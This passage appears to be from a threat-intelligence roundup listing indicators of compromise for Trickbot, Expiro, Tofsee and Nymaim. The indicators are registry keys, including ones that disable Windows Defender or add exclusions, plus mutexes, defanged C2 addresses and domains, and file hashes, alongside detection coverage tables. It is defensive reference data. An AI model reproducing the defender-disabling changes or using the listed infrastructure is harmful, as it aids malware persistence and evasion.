AMP\n\n[](<https://1.bp.blogspot.com/-zaAbJCVallA/XbMVTdEoonI/AAAAAAAAC1s/cey-CAka8WobFk98jUOtCE7HFMAoOxDsgCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qS_zecVWJxI/XbMVYEMg2nI/AAAAAAAAC1w/V5lxMAi6DuQbwgmFw5TNxvUNFBLXvEfKQCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7352185-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: DeleteFlag ` | 23 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 23 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 23 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`200[.]122[.]209[.]78` | 8 \n`176[.]119[.]156[.]225` | 6 \n`31[.]202[.]132[.]22` | 5 \n`190[.]0[.]20[.]114` | 3 \n`152[.]89[.]245[.]209` | 3 \n`103[.]122[.]33[.]58` | 2 \n`181[.]143[.]17[.]66` | 2 \n`45[.]160[.]145[.]216` | 2 \n`37[.]44[.]212[.]179` | 2 \n`80[.]173[.]224[.]81` | 1 \n`119[.]92[.]23[.]203` | 1 \n`201[.]184[.]69[.]50` | 1 \n`190[.]109[.]178[.]222` | 1 \n`68[.]186[.]167[.]196` | 1 \n`45[.]160[.]145[.]11` | 1 \n`185[.]255[.]79[.]127` | 1 \n`45[.]160[.]145[.]179` | 1 \n`117[.]204[.]255[.]139` | 1 \n`103[.]87[.]48[.]37` | 1 \n`195[.]123[.]237[.]155` | 1 \n`190[.]109[.]169[.]49` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\browser\\settings.ini` | 23 \n`%APPDATA%\\browser` | 23 \n`%System32%\\Tasks\\BrowserStorage` | 23 \n`%APPDATA%\\BROWSER\\<original file name>.exe` | 23 \n \n#### File Hashes\n\n` 0627afe0eb7517208d514c54b83436885eae259fa984bd6dbcfeb788ce5f2b80 0e21da4e3c8dfd077454f417b8b602b281887dbc487cce3e60a508b03ec7a897 2820d3a726768ac98f7357f182fa0f27e63743c025a40025f316a281dbecfe66 4e6f460398ab227ece450409e1343665b73a73f1c330b9ebbb8a03c8c2171f1b 587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e 66b9b21677bfbb131aaab959f603091db4ce740a92c2376d84df43343b2de68d 69b4a369319e0c9c16fee1fe7db6f5ccc20076e4296a000f92f756ef1cb31533 756bf7440aa067883f18db9c567fa11c45aa9a7ee05e86bd2f759a726500d90d 80096a877332490f8e5d303906335e5420e8a95f90109c08596330ab0d77cf8a 843019efa320b08991d64ce99faaa5a254af828f6f8be64715f6e5f3833769be 877f01088ac912f8e7cfffd81b86ba21d8eeaccb5e3f675fd5299efab7e8fc5f 8fc61570c2e05fd746da7e7e14d9558afe38b0f00e6ccf2c43e0fd46247fb8f2 9706de7a46a3a13ba3275aa583ac70b31071a8fb30e3bd1061ceb0c3ea6532fe a5eb7f6a1d253fe60bf02e19a8858fd80dc4a7358f660d84fa85b6f6e011b11e bd26a6bd3d52b26c66f1b3503b0dd901a68318a66caa846d77fde10ad6f9668a c84b91da836a003057d90123e25cbaec576a20d1f98c621d777de47cdfdd40e3 cad65e1ce6ec9e36e8073c79a0a406997ed825e65af3952e55ea9c44c6e39122 ce5393632e1c0adb91af5ffc8a6b486141cb895a3b762b853ebfdb3518563dbf d0e9f2ba27da2bee48617c219a2a5e4b2db9d96b5e19ac16098384c3bb36c65f d54747ba18aec6ee4a9670148fd420dab486992f37df1e577abd9bc4d5dd2eb6 dd5ae9ad15a51845b317b83ba6d0bf2f010b2dfae3c85e7099b95c9bb0ea09a0 f79bac124531d2050d668a510e074930f5c1c9af7997a9513a8f16eb7549a8b7 fc061e1261397c24a7d074a7cac01e74af9f47b6300911f3734104c1557928d8 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0rUv1OadjA/XbMWmL1F6ZI/AAAAAAAAC2A/svzZCUcu6QsSkhOt_fd-qJfm5uFDhz8RwCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-qi2ScRtKTqA/XbMW296nkQI/AAAAAAAAC2I/s7dXfc-_ixAnV-Ae-tjEWFafwfVCbDzpQCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Virus.Expiro-7350682-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V4.0.30319_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\COMSYSAPP \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MOZILLAMAINTENANCE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MSISERVER \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\OSE \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\CLR_OPTIMIZATION_V2.0.50727_32 \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\AELOOKUPSVC \nValue Name: Start ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 16 \nMutexes | Occurrences \n---|--- \n`kkq-vx_mtx1` | 16 \n`gazavat-svc` | 16 \n`kkq-vx_mtx67` | 16 \n`kkq-vx_mtx68` | 16 \n`kkq-vx_mtx69` | 16 \n`kkq-vx_mtx70` | 16 \n`kkq-vx_mtx71` | 16 \n`kkq-vx_mtx72` | 16 \n`kkq-vx_mtx73` | 16 \n`kkq-vx_mtx74` | 16 \n`kkq-vx_mtx75` | 16 \n`kkq-vx_mtx76` | 16 \n`kkq-vx_mtx77` | 16 \n`kkq-vx_mtx78` | 16 \n`kkq-vx_mtx79` | 16 \n`kkq-vx_mtx80` | 16 \n`kkq-vx_mtx81` | 16 \n`kkq-vx_mtx82` | 16 \n`kkq-vx_mtx83` | 16 \n`kkq-vx_mtx84` | 16 \n`kkq-vx_mtx85` | 16 \n`kkq-vx_mtx86` | 16 \n`kkq-vx_mtx87` | 16 \n`kkq-vx_mtx88` | 16 \n`kkq-vx_mtx89` | 16 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.exe` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\OSE.EXE` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\GROOVE.EXE` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v2.0.50727\\ngen_service.log` | 16 \n`%SystemRoot%\\Registration\\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{33EC2C09-9668-4DE7-BCC0-EFC69D7355D7}.crmlog` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.exe` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.exe` | 16 \n`%SystemRoot%\\SysWOW64\\svchost.exe` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.vir` | 16 \n`\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\dwtrig20.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.vir` | 16 \n`\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\setup.vir` | 16 \n`%CommonProgramFiles(x86)%\\microsoft shared\\Source Engine\\ose.vir` | 16 \n`%ProgramFiles(x86)%\\Microsoft Office\\Office14\\groove.vir` | 16 \n`%ProgramFiles(x86)%\\Mozilla Maintenance Service\\maintenanceservice.vir` | 16 \n`%SystemRoot%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.vir` | 16 \n`%SystemRoot%\\SysWOW64\\dllhost.vir` | 16 \n`%SystemRoot%\\SysWOW64\\msiexec.vir` | 16 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\extensions\\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\\chrome.manifest` | 16 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 356d00dc8ff16fb18f68ccf4f622ab551979b6e14fb802a5c7f394038e19b384 40601e6f4ecb0879bf458b2ce1912ca780b723f971a6cf7c0dd900dd97ff024c 598726fe4b882d2510f3d05d60d58627fd9cf7b90d26187c344a5d9e27902588 5fb45cd8e75ac1418c72843ab892622ebcf9b6c744b5373bd79d825ddb202814 6ef92eff4e1fa8f4093880e24a99341fbe6f9365437920f995af24a73c73a71a 701ae8d2647c886f84c538a9846abdc98ebab9adf994143e17b298f7a6158085 7450df6862c201f3954495ee2b9e1f18b699b7a050cfbfe41db2f68c04b46d76 84f35b43d4f36e1135ce90853af4b5ee0bc1b4969740e4abb2551f067027c9ee 86e65f10866176f9b20bfb6b6b793d743576f532e811e638c4a6fa238e17c900 9739ae5c12dce410017a5ca6be2f169e97d23da942eaf85e0f365a33035478a4 9ce9ec31b261d6ecd124f6b5b2b408ae1b17ca78aea5287ea2b93e1ecfb76e8e a3c8e47460067b1733559dbbc2d7245a569e3e4aa67b36c67c74ca7f64511d26 acc76ce4ad9708b1a0562fcf8cc27c1ba06e9cbac781b438bdf6b57bd775d3dd c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25 e35f51fc7fe79189d163f04b9f083bc2f0127b72645045693d864e6d0e4004af f5e1a8f1c48cd0cda719e7da167f91c3e0696f4a259a22b0160763b7aeacf602 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LaqvOO40vjg/XbMXJX1qB7I/AAAAAAAAC2Q/NMrCii_ipxcANoafTA3hZqT3EqN0_5ONgCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-_PlIsPJvDsU/XbMXNIrBrXI/AAAAAAAAC2U/TM5kKFyOyIYs0IhkCv41hxt2Hd1-Yi63wCLcBGAsYHQ/s1600/c0f4595ecff664a7d0ec7669a084128915c9a01a4ba058ccb4c4ea04c636fe25_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Tofsee-7349716-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 28 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 4 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\kjsstakc ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jirrszjb ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qpyyzgqi ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fennovfx ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wveefmwo ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cbkklscu ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ihqqryia ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dcllmtdv ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\vuddelvn ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lkttubld ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xwffgnxp ` | 1 \nMutexes | Occurrences \n---|--- \n`{<random GUID>}` | 4 \n`Global\\VLock` | 3 \n`Frz_State` | 1 \n`Sandboxie_SingleInstanceMutex_Control` | 1 \n`18550D22-4FCA-4AF2-9E8E-F0259D23694F` | 1 \n`b7969e9f2199` | 1 \n`<32 random hex characters>` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`103[.]248[.]137[.]133` | 28 \n`111[.]121[.]193[.]242` | 28 \n`104[.]47[.]54[.]36` | 17 \n`104[.]47[.]53[.]36` | 11 \n`40[.]113[.]200[.]201` | 7 \n`40[.]112[.]72[.]205` | 4 \n`40[.]76[.]4[.]15` | 4 \n`5[.]9[.]49[.]12` | 4 \n`144[.]76[.]133[.]38` | 4 \n`45[.]63[.]25[.]55` | 4 \n`89[.]18[.]27[.]34` | 4 \n`87[.]98[.]175[.]85` | 4 \n`104[.]215[.]148[.]63` | 3 \n`5[.]135[.]183[.]146` | 3 \n`45[.]32[.]28[.]232` | 3 \n`141[.]138[.]157[.]53` | 3 \n`45[.]63[.]99[.]180` | 3 \n`108[.]61[.]164[.]218` | 3 \n`45[.]56[.]117[.]118` | 3 \n`96[.]90[.]175[.]167` | 3 \n`104[.]238[.]186[.]189` | 3 \n`84[.]201[.]32[.]108` | 3 \n`185[.]133[.]72[.]100` | 3 \n`193[.]183[.]98[.]154` | 2 \n`23[.]94[.]5[.]133` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 28 \n`ponedobla[.]bit` | 4 \n`myexternalip[.]com` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`nekfad[.]xyz` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 28 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 28 \n`%TEMP%\\<random, matching '[0-9]{4}'>.bat` | 28 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 27 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 7 \n`%APPDATA%\\By\\By.exe` | 4 \n`%APPDATA%\\winapp\\client_id` | 3 \n`%APPDATA%\\winapp\\group_tag` | 3 \n`%System32%\\Tasks\\services update` | 3 \n`%APPDATA%\\winapp` | 3 \n`%APPDATA%\\WINAPP\\<original file name>.exe` | 3 \n`%APPDATA%\\winapp\\qtmld.exe` | 1 \n`%APPDATA%\\HNC\\User\\Common\\90\\Fonts\\Fontlist\\signons.exe` | 1 \n`\\container.dat` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808` | 1 \n`%LOCALAPPDATA%\\589ff121627b2b278b78a4a16bbdac82a879c808\\container.dat` | 1 \n`%SystemRoot%\\Temp\\1676.bat` | 1 \n`%SystemRoot%\\Temp\\atfjtxxz.exe` | 1 \n`%TEMP%\\updbb837023.bat` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\compatibility.mik` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\cookies.wic` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\extensions.exe` | 1 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\webappsstore.oty` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu` | 1 \n`%APPDATA%\\MozillaMaintenanceServiceu\\MozillaMaintenanceServiceu.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 074af81963d44e82625056fa1772e2ab6e8b5bbfb58919c4ed4fea1e22df0a58 0d84479eb9868d33fc22a93e8f8a8555dc80c38a00197017bc86e91b3af9da9c 0f6a235a6e9a6eb292a6c5ada9043ad1efde537f19598849682f1eeb0d828e75 173100397fab511b430ba1d2f417ed19fcaadfe3d8ca8e97af6a05432fbaf3a6 2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2 2e3e02ff35a656d7edfcf29878e501492d4529f68b90b9d2bfa56314f5ffac99 37c6a10dc539555beaef7b4f73418f6721a37b2dbd1f0cecd891381b779a2d22 38ae264016466acb3d215c1451898050580e2a5bbc41cfe6dc441ce9e9dc0690 39ae2c5a2c33d0182ac83cc4440fc1ff6d5c78e3f6a861d0cc2bbc67ec16d0a4 3a303bc815ab0032c143f191f949ff833b0cc31b4349de8460bb4efd7dc1d4d8 3d085c1a1719b6520867aa16997a3aaa214efb2bac1e3ba9f4365def6cd3425e 3ecff383a31433ee6ea3b4faf9a83ed88beba6836d73cf5e45c35c4b2da88fb5 49e4a03514e44969dfd0e0e9d8c6ab90aad572461e92de573ed07f2fd289e943 5099df074e08c348f605a2171b0bd2c0fd8d118eee0d2c53f70f148aa0819e3c 519e96344029271df9b3f758a6891f8342492e43f28efa02796880e8cfaedd70 51be864bb2a297d99bf04cea956400e088ff86029c0031aa9c42f0491efcb544 530d0f977e0f3f34e4876e145677280dc662ea1d84ceb23ba34c7406582bfc71 544d256e79b29963fdeb13a39843c9c40f346d1fb977927c9ede0b37d9bea71e 5d3796595808d10fc9953dc33085e88722a75238f478471cc3723e74b1fffc7f 5fa50f66fd754d9207960ddae6764e45bfb084e9134ac5c4e7755cb9a1e92825 62386fac16d57a15f34b0874a7125f20e21442da376eb7ca1eca86f9edd8cf48 63c93baef82f65d8b47634c77eb5c250ec0546e8f86395ecad2b96a0c6e726b8 655726d8f43ae4d74631cbd1dfcf0a9649461360ee402ae574cc48a2b869a913 6d7fd6fd6ef01477b0e3b075f3d0783ce9168abded6d237f4579987d3a02f744 770dba34f27b6d21d3857e54d9fbb22694428aa1d019b5da7e93d8bedcb1b92f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JRpesC3qwbc/XbMXdJHjtUI/AAAAAAAAC2g/esOdAWClS5Ym6UbSd9AjI9s7TSoYjsZjACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rVEl9G_vIzU/XbMXf2YdJvI/AAAAAAAAC2k/OiLBgscS8TgKXJwdDI3xZW7C5bnHUZqCACLcBGAsYHQ/s1600/2b5f5d317466ee9c4b54b6d840c0cf0e76e9633640df3a9c8f041212239839d2_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-k5JZcxpU5Ro/XbMXlPfL7ZI/AAAAAAAAC2o/yZfb6jFVztAgQi54MTKx5Jh8TtT54oawACLcBGAsYHQ/s1600/2f69e8d8f5ae09ffdfd1b1f2dbf001ad480deea5aeb47a6a563d98a16f5415d9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7348211-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 9 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 9 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 9 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 9 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 9 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 9 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 9 \n`Local\\{74966FCB-4057-0A33-C72F-DA1761B8A937}` | 9 \n`Local\\{457A7A9B-5537-F010-1620-E1BCC38A93D1}` | 9 \n`Local\\{<random GUID>}` | 9 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`64[.]71[.]188[.]178` | 13 \n`66[.]220[.]23[.]114` | 8 \n`184[.]105[.]76[.]250` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`qjgtlozoh[.]com` | 14 \n`ezgouisk[.]pw` | 9 \n`ryron[.]com` | 1 \n`onubkqstb[.]com` | 1 \n`jeajlfdtoua[.]in` | 1 \n`ysxmebrfyg[.]net` | 1 \n`oxfab[.]pw` | 1 \n`bwapyvznpflh[.]pw` | 1 \n`voszetuy[.]in` | 1 \n`klspisvji[.]in` | 1 \n`ofiracujrsdy[.]net` | 1 \n`istpmxnf[.]net` | 1 \n`sianowq[.]pw` | 1 \n`gpkoz[.]pw` | 1 \n`sdghuwtwxsm[.]com` | 1 \n`uslrspq[.]pw` | 1 \n`kwchhgmla[.]in` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\fro.dfx` | 19 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 19 \n`%ProgramData%\\ph` | 9 \n`%ProgramData%\\ph\\fktiipx.ftf` | 9 \n`%TEMP%\\gocf.ksv` | 9 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 9 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\mlo.aqz` | 1 \n`\\Documents and Settings\\All Users\\ju\\xcio.cxj` | 1 \n \n#### File Hashes\n\n` 3ef2abee25c7ba9f153048e3c400f2935e3e40f988e79b55d12843a90b85a2c1 5816c31cfc9208418279e80e661be48705b54eef97612e2a3acb6b43e1520707 6743826da7e312a954d21cffa0e795599c64ac484ab913da0516d9a8c27c7d8f 74eba0187ce6b3abbc20e1ab98c0732fbf79f680b65ecd7c45eafd81370d0e5e 8dcf86bd3796d59fa421e8b2c442355a72c8a58eb489bc268063c8823bc880ba 97950901d1a3cb6713d8e59e21b4312e3ebc98f0e67071590b0b0514a67cdf1e 98e61798ed2d611ddb45b515bb45fbdd8b45ca5820f50297b4a3152e20d6768b a6bedf7f7e6fa95b3181e466468ec1812227396d18b51e027ffd670fc4699d4d a97dc1afeec16c38f5d92e1096930bfa61a60a8c4ccd3f378f5eb6f27ac5a58d ae65aa4775949b46281b12ffccd29da2aa2ba9463b7a26b17d9170153da8ab85 aee701fe3b36b6441a17ae591f6272764dfaf1361d688ca353813e022b90b545 b8d7cf0c79024e1cd6564731df735059705896d635951019b21d3719a69e64e6 bfa4b25db8ca23842ea3c6d977668c6110b0ca23919b395864065f09e8f15638 c3791696930b1226ccc03537ee50cdf275069b39524b808e3857ae9e85d6ca15 c8f6c7ff30e91b7236802bffaa759ada33ad7963bd3401912d3df9c108205a10 